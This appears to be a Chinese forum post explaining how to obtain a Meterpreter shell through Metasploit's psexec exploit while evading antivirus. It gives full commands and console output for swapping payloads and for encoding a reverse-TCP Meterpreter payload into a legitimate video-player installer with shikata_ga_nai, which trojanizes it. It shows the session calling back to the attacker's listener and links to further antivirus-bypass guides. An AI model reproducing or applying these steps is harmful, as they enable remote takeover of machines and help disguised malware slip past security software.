What is a payload?如官方所说的:
A payload is the piece of software that lets you control a computer system after it’s been exploited. The payload is typically attached to and delivered by the exploit. Just imagine an exploit that carries the payload in its backpack when it breaks into the system and then leaves the backpack there. Yes, it’s a corny description, but you get the picture. Metasploit’s most popular payload is called Meterpreter, which enables you to do all sorts of funky stuff on the target system. For example, you can upload and download files from the system, take screenshots, and collect password hashes. You can even take over the screen, mouse, and keyboard to fully control the computer. If you’re feeling particularly bad-ass, you can even turn on a laptop’s webcam and be a fly on the wall. 对应本地和网页网页类型的都有很多绕过安全软件的方法,如对应win7的 powershell ,对于java的java_signed_applet ,浏览器漏洞的 免杀 和生成exe等等文件的msfpayload
对应远程的payload呢?现在的PC或者SERVER,很少见不装安全软件的。
例如一个psexec,当知道对方帐号密码后能获得一个SHELL 当写入配置后 写入 PAYLOAD
- msf exploit(psexec) > set PAYLOAD windows/meterpreter/reverse_tcp
- PAYLOAD => windows/meterpreter/reverse_tcp
复制代码
执行
没如预料,获得SHELL?什么原因? 大部分是杀毒杀了
换个PAYLOAD试试
- msf exploit(psexec) > set PAYLOAD windows/meterpreter/bind_tcp
- PAYLOAD => windows/meterpreter/bind_tcp
- msf exploit(psexec) > exploit
- [*] Connecting to the server...
- [*] Started bind handler
- [*] Authenticating to 5.5.5.4:445|WORKGROUP as user 'administrator'...
- [*] Uploading payload...
- [*] Created \lJGSOEfc.exe...
- [*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:5.5.5.4[\svcctl] ...
- [*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:5.5.5.4[\svcctl] ...
- [*] Obtaining a service manager handle...
- [*] Creating a new service (GkoJyXLg - "MoAih")...
- [*] Closing service handle...
- [*] Opening service...
- [*] Starting the service...
- [-] Error: execution expired
复制代码
也不行,这个时候可以试试windows/download_exec_https 和 windows/download_exec_https 试试,但是EXE核VBS不免杀也是一样的结果。。
为了取得一个暂时的SHELL 可以这样
- root@Pc:/tmp# msfpayload windows/meterpreter/reverse_tcp LHOST=5.5.5.1 LPORT=4444 R | msfencode -t exe -x /tmp/QvodSetup5.exe -k -o brk.exe -e x86/shikata_ga_nai -c 5
- [*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)
- [*] x86/shikata_ga_nai succeeded with size 344 (iteration=2)
- [*] x86/shikata_ga_nai succeeded with size 371 (iteration=3)
- [*] x86/shikata_ga_nai succeeded with size 398 (iteration=4)
- [*] x86/shikata_ga_nai succeeded with size 425 (iteration=5)
- root@Pc:/tmp# file brk.exe
- brk.exe: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
- root@Pc:/tmp#
复制代码
设置漏洞利用
- msf exploit(psexec) > set EXE::Custom /tmp/brk.exe
- EXE::Custom => /tmp/brk.exe
复制代码
利用
- msf exploit(psexec) > exploit
- [*] Started reverse handler on 5.5.5.1:4444
- [*] Connecting to the server...
- [*] Authenticating to 5.5.5.4:445|WORKGROUP as user 'administrator'...
- [*] Uploading payload...
- [*] Using custom executable /tmp/brk.exe, RHOST and RPORT settings will be ignored!
- [*] Created \rvUEPiZp.exe...
- [*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:5.5.5.4[\svcctl] ...
- [*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:5.5.5.4[\svcctl] ...
- [*] Obtaining a service manager handle...
- [*] Creating a new service (cazeVsDU - "MvmIaTXVREiiMlcePrzIFKpp")...
- [*] Closing service handle...
- [*] Opening service...
- [*] Starting the service...
- [*] Sending stage (752128 bytes) to 5.5.5.4
- [*] Meterpreter session 1 opened (5.5.5.1:4444 -> 5.5.5.4:1369) at 2012-12-04 19:19:49 +0800
复制代码
发现获得了SHELL 快播也在运行了
这只是一个列子 你可以通过set EXE::Custom 设置你的免杀后门
关于免杀参考:
http://fuzzexp.org/porting-the-public-exploits-to-metasploit.html
http://fuzzexp.org/msfpayload-and-msfencode-with-metasploit.html
http://fuzzexp.org/how-to-bypass-antivirus-with-metasploit.html
http://fuzzexp.org/msfpayload-script-msfpayload-generator-script.html
|